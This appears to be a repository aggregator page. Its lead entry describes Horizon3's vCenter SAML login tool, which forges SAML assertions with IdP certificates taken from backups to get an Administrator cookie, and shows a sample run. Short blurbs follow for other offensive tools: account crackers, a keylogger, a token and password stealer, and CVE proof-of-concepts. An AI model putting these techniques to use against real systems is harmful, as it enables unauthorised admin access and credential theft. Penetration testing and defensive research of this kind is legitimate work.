A tool to extract the IdP cert from vCenter backups and log in as Administrator

Related tags

Security related resourcesvcenter_saml_login
Overview

vCenter SAML Login Tool

A tool to extract the Identity Provider (IdP) cert from vCenter backups and log in as Administrator

Background

Commonly, during engagements, we will gain access to vCenter backups on a fileserver or gain root access to the VCSA host through recent CVEs. Logging into the vCenter vSphere UI allows us to easily gain access to more systems, confidential information, as well as show customers the impact of these findings.

The data.mdb file contains the certificates and can be found within vCenter backups as well as on the VCSA host with root permissions. These certificates are stored in cleartext and can be used to sign any SAML authentication request for any user - including the builtin Administrator.

If you'd like to know more about several use cases for this tool and how we've used it to gain Administrative access to vCenter hosts check out our blog post: https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/

Usage

[email protected]:~/vcenter# python3 vcenter_saml_login.py -p data.mdb -t 10.0.100.200
[*] Successfully extracted the IdP certificate
[*] Successfully extracted trusted certificate 1
[*] Successfully extracted trusted certificate 2
[*] Obtaining hostname from vCenter SSL certificate
[*] Found hostname vcsa.olympus for 10.0.100.200
[*] Initiating SAML request with 10.0.100.200
[*] Generating SAML assertion
[*] Signing the SAML assertion
[*] Attempting to log into vCenter with the signed SAML request
[+] Successfuly obtained Administrator cookie for 10.0.100.200!
[+] Cookie: VSPHERE-UI-JSESSIONID=06D1630719B4DE33A4CE653458911640

With the above cookie, visit the VCSA instance at https:// /ui, add the cookie under the /ui path, and re-browse to https:// /ui.

Demonstration

Disclaimer

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.

Owner
Horizon 3 AI Inc
AI-powered Pen Tests. See your enterprise through the eyes of an attacker & fix what matters.
Horizon 3 AI Inc
GitHub Repository
Facebook account cloning/hacking advanced tool + dictionary attack added | Facebook automation tool

loggef Facebook automation tool, Facebook account hacking and cloning advanced tool + dictionary attack added Warning Use this tool for educational pu

Md Josif Khan 149 Aug 10, 2022
Lnkbomb - Malicious shortcut generator for collecting NTLM hashes from insecure file shares

Lnkbomb Lnkbomb is used for uploading malicious shortcut files to insecure file

Joe Helle 216 Jan 08, 2023
Script checks provided domains for log4j vulnerability

log4j Script checks provided domains for log4j vulnerability. A token is created with canarytokens.org and passed as header at request for a single do

Matthias Nehls 2 Dec 12, 2021
the metasploit script(POC) about CVE-2021-36260

CVE-2021-36260-metasploit the metasploit script(POC) about CVE-2021-36260. A command injection vulnerability in the web server of some Hikvision produ

Taroballz 14 Nov 09, 2022
Keystroke logging, often referred to as keylogging or keyboard capturing

Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording the keys struck on a keyboard, typically covertly, so that a person using the keyboard is unaware

Harsha G 2 Jan 11, 2022
Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)

Pachine Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation). Installtion $ pip3 install impacket Usage Impacket v0.9.23 -

Oliver Lyak 250 Dec 31, 2022
A repository to detect the ARP spoofing in any devices and prevent Man in the Middle(MITM) attack using Python3

arp_spoof_detector A repository to detect the ARP spoofing in any devices and prevent Man in the Middle(MITM) attack using Python3 Usage: git clone ht

Surya Das N 1 Oct 30, 2021
Early days of an Asset Discovery tool.

Please star this project! Written in Python Report Bug . Request Feature DISCLAIMER This project is in its early days, everything you see here is almo

grag1337 3 Dec 20, 2022
Dapunta Multi Brute Force Facebook - Crack Facebook With Login - Free

✭ DMBF CRACK Dibuat Dengan ❤️ Oleh Dapunta Author: - Dapunta Khurayra X ⇨ Fitur Login [✯] Login Token ⇨ Fitur Crack [✯] Crack Dari Teman, Public,

Dapunta ID 10 Oct 19, 2022
MassStringer, CTF Flag Finder

massStringer MassStringer, CTF Flag Finder Usage: python3 massStringer.py Enter absolute path of the directory to scan for flags Edit "flag = re.searc

SuperTsumu 4 Sep 06, 2022
The Devils Eye is an OSINT tool that searches the Darkweb for onion links and descriptions that match with the users query without requiring the use for Tor.

The Devil's Eye searches the darkweb for information relating to the user's query and returns the results including .onion links and their description

Richard Mwewa 135 Dec 31, 2022
Python implementation for PrintNightmare using standard Impacket.

PrintNightmare Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527) using standard Impacket. Installtion $ pip3 install impacket

ollypwn 141 Dec 31, 2022
Spring4Shell - Spring Core RCE - CVE-2022-22965

Spring Core RCE - CVE-2022-22965 After Spring Cloud, on March 29, another heavyweight vulnerability of Spring broke out on the Internet: Spring Core R

Malte Gejr 118 Dec 31, 2022
CVE-2022-22965 - CVE-2010-1622 redux

CVE-2022-22965 - vulnerable app and PoC Trial & error $ docker rm -f rce; docker build -t rce:latest . && docker run -d -p 8080:8080 --name rce rce:la

Duarte Duarte 20 Aug 25, 2022
Script for automatic dump and brute-force passwords using Volatility Framework

Volatility-auto-hashdump Script for automatic dump and brute-force passwords using Volatility Framework

whoamins 11 Apr 11, 2022
SCodeScanner stands for Source Code scanner where the user can scans the source code for finding the Critical Vulnerabilities.

The SCodeScanner stands for Source Code Scanner, where you can scan your source code files like PHP and get identify the vulnerabilities inside it. The tool can use by Pentester, Developer to quickly

136 Dec 13, 2022
A token logger for discord + steals Brave/Chrome passwords and usernames

Backdoor Machine - ❗ For educational purposes only ❗ A program made in python for stealing passwords and usernames from Google Chrome/Brave and tokenl

36 Jul 18, 2021
CVE-2022-22536 - SAP memory pipes(MPI) desynchronization vulnerability CVE-2022-22536

CVE-2022-22536 SAP memory pipes desynchronization vulnerability(MPI) CVE-2022-22

antx 49 Nov 09, 2022
IDA Python Script for anti ollvm

IDA Python Script for anti ollvm

Shocker 62 Dec 23, 2022
Brute-forcing (or not!) deck builder for Pokemon Trading Card Game.

PokeBot Deck Builder Brute-forcing (or not!) deck builder for Pokemon Trading Card Game. Warning: intensely not optimized and spaghetti coded Credits

Hocky Harijanto 0 Jan 10, 2022